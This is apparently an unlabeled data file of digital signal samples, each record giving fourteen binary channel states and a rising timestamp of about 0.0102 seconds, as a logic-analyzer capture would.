1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158588e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158628e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0158632e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158636e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0158680e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158708e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0158712e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158732e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158756e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158780e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158804e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158828e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158856e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158880e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158908e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0158956e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158988e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159004e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159028e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159056e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159080e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159108e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159132e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159156e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159180e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159228e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159256e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159280e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0159284e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0159332e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0159356e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159380e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159404e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159428e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159456e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0159460e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0159508e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0159532e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159540e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159556e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159580e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159628e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159656e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159680e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159708e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159732e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159756e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159780e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0159784e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0159788e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0159828e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0159856e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0159860e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159880e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159908e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159932e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0159956e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0159980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160052e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160060e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0160104e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160128e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0160132e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160136e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160152e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160180e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0160228e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160260e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160304e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160328e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160380e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160404e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160476e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160484e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0160528e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160552e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160560e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160628e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160652e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160676e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160700e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160728e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160732e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0160780e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0160804e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160828e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160852e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160876e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160900e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160928e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0160952e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0160980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161052e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161128e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161152e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161180e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161204e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161228e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161252e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161328e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161352e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161380e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161404e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161428e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161452e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161476e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161528e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161552e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161580e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161604e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161628e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161652e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161728e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161752e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161780e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161804e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161828e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161852e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161876e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161900e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161928e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0161952e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0161980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162052e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162128e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162152e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162180e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162204e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162228e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162252e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162328e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162352e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162380e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162404e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162428e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162452e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162476e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162528e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162552e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162580e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162604e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162632e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162660e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162680e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162708e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162732e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162756e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162780e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162804e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162828e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162860e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162880e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162908e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162932e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0162956e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0162980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163056e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163080e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163104e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163132e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163156e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163180e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163204e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163228e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163252e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163280e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163304e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163332e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163356e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163380e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163404e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163428e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163452e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163480e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163508e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163532e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163556e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163580e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163604e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163628e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163656e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163680e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163704e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163732e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163756e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163780e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163804e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163828e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163852e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163880e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163904e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163932e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0163956e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0163980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0164028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164052e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0164080e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164108e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0164132e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164156e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0164180e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164204e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0164228e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164256e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0164280e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0164304e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0288788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0288964e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0288988e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,1.0289012e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0289044e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.0289332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0289356e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.0289360e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.0289404e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.0289428e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0289436e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.0289452e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0289476e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.0289484e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.0289528e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.0289556e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,1,1.0289560e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0289564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.0289580e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0289604e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.0289608e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0289620e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0289652e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0289676e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0289684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0289704e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0289728e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0289732e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0289780e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0289804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0289812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0289828e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0289852e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0289876e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0289900e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0289928e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0289952e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290028e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290036e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0290076e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290104e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290108e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290128e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290152e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290156e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0290204e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290228e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290236e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290276e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290300e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290328e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290352e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290428e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290432e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0290476e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290504e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290508e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290528e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290552e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290556e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0290604e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290628e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290636e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290652e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290676e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290700e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290728e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290828e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290852e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290860e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0290904e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0290928e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0290932e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290936e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0290956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0290980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291028e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291052e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291076e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291108e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291156e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291180e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291204e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291228e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291256e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0291260e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0291308e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0291332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291340e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291428e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0291436e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0291484e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0291508e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0291512e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291556e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291580e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291604e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291628e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291656e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291680e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291708e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291756e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0291760e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0291804e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0291828e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291836e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291884e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291908e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291932e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0291956e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0291980e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292004e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292028e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292056e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292060e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292108e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292180e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292188e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292204e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292228e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292256e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292280e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292308e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292332e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292356e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292380e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292432e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292456e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292484e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292556e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292580e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292604e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292612e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0292656e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0292684e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292688e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292856e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0292956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0292980e-02 